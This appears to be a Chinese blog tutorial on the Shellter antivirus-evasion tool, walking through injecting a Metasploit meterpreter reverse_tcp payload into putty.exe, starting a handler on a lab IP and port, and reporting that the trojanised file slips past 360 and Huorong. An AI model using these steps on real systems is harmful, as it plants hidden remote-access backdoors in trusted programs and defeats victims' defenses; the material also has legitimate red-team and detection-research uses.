0x01 免殺能力一覽表

幾點說明：

1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒，也就是代表了Bypass。

2、為了更好的對比效果，大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機測試時只是安裝了360全家桶和火絨，所以默認情況下360和火絨殺毒情況指的是靜態+動態查殺。360殺毒版本5.0.0.8160(2019.12.12)，火絨版本5.0.33.13(2019.12.12)，360安全衛士12.0.0.2001(2019.12.17)。

4、其他殺軟的檢測指標是在virustotal.com（簡稱VT）上在線查殺，所以可能只是代表了靜態查殺能力，數據僅供參考，不足以作為免殺的精確判斷指標。

0x02 前言

Shellter和Venom、Veil是三大老牌免殺工具，Shellter是一個開源的免殺工具，利用動態Shellcode注入或者命令來實現免殺的效果。

0x03 安裝shellter

1、kali中已經自帶shellter，可在圖形界面中直接執行shellter命令即可

2、ubuntu系統中apt安裝

apt-get update apt-get install shellter

3、手動下載windows版
官方下載站點 https://www.shellterproject.com/download/
下載后解壓，無需安裝，cmd下可直接使用

0x04 生成payload

我就直接用kali自帶的shellter進行演示，需要提前準備一個pe文件作為被注入程序。我還是用之前選的putty.exe來進行測試。

之后程序會把putty.exe進行備份，因為生成的payload會自動覆蓋原來的putty.exe。

還是選擇windows/meterpreter/reverse_tcp作為payload

上面有個選項Enable Stealth Mode，是否啟用隱身模式，啟用后免殺效果會變差，建議不啟用。

全程自動化生成，最終的生成文件會替換原來的putty.exe。

通過對比可發現程序稍微變大了

在msf中使用handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp進行監聽

在測試機中執行生成的putty.exe，360和火絨均可免殺，我試的時候火絨不可免殺，可能我的火絨版本比較高

msf正常上線

0x05 小結

Shellter安裝非常簡單，使用也非常便捷，而且生成的payload免殺效果也都比較好，windows和linux下都可以使用，實在是居家旅行、**滅口必備良藥。我是用的自動模式進行生產payload,你可以根據自己的需要進行手動配置，這樣生成的payload免殺效果會更好。

因為Shellter生成的shellcode是動態的，所以被查殺的幾率也有所不同，測試過幾次自動化生成的payload，最好的秒殺效果是4/71，最差的15/70，整體來說也算不錯了

0x06 參考

msf免殺及后滲透技術：https://bbs.ichunqiu.com/thread-49618-1-1.html

總結

以上是生活随笔為你收集整理的远控免杀专题7 ---shellter免杀的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。